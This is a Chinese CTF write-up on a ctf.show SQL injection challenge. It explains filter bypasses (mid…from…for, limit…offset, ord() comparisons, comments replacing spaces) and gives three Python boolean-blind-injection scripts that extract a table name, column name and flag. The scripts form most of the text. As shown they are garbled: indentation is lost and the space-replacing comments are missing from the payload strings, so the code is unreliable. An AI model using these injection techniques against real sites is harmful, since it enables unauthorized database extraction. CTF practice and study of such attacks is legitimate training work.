题目提示是一道sql注入题
打开题目,猜测注入点应该在id那里
经过测试,发现该题过滤了union关键字、单引号、逗号、空格
问题解决1.过滤了union关键字就不可以用联合注入了,尝试布尔盲注。
2.过滤了逗号,使用mid(username from 1 for 1)代替mid(username,1,1);
使用limit 1 offset 1代替limit 1,1
3.过滤了空格就是用注释来绕过。
4.过滤了单引号,我们使用ord()将待检测字符转换为ascii进行比较
下面我们来写python脚本跑一下
获取数据表名import requests
chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"#待测试字符
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"#题目地址
for n in range(0,2):#爆破前两个表
table_name = ''
for i in range(1, 10):#爆破数据表名的前十位(我们猜测该表名长度低于十位)
for char in chars:#测试每一个待测字符
params = {
"id":
"-1orord(mid((selecttable_namefrominformation_schema.tableswheretable_schemain(database())limit1offset"+str(n)+")from"+str(i)+"for1))in("+str(ord(char))+")"
}
r = requests.get(url=url, params=params)
#print(r.request.url)
if "If" in r.text:
table_name += char
print( table_name)
获取字段名
import requests
chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"
for n in range(0,1):
table_name = ''
for i in range(1, 10):
for char in chars:
params = {
"id":
"-1orord(mid((selectcolumn_namefrominformation_schema.columnswheretable_namein(0x666c6167)limit1offset"+str(n)+")from"+str(i)+"for1))in("+str(ord(char))+")"
}
r = requests.get(url=url, params=params)
#print(r.request.url)
if "If" in r.text:
table_name += char
print( table_name)
获取字段值
import requests
chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"
for n in range(0,1):
table_name = ''
for i in range(1, 50):
for char in chars:
params = {
"id":
"-1orord(mid((selectflagfromflaglimit1offset"+str(n)+")from"+str(i)+"for1))in("+str(ord(char))+")"
}
r = requests.get(url=url, params=params)
#print(r.request.url)
if "If" in r.text:
table_name += char
print( table_name)
获取flag
来自ctf小菜鸡的日常分享,欢迎各位大佬留言。
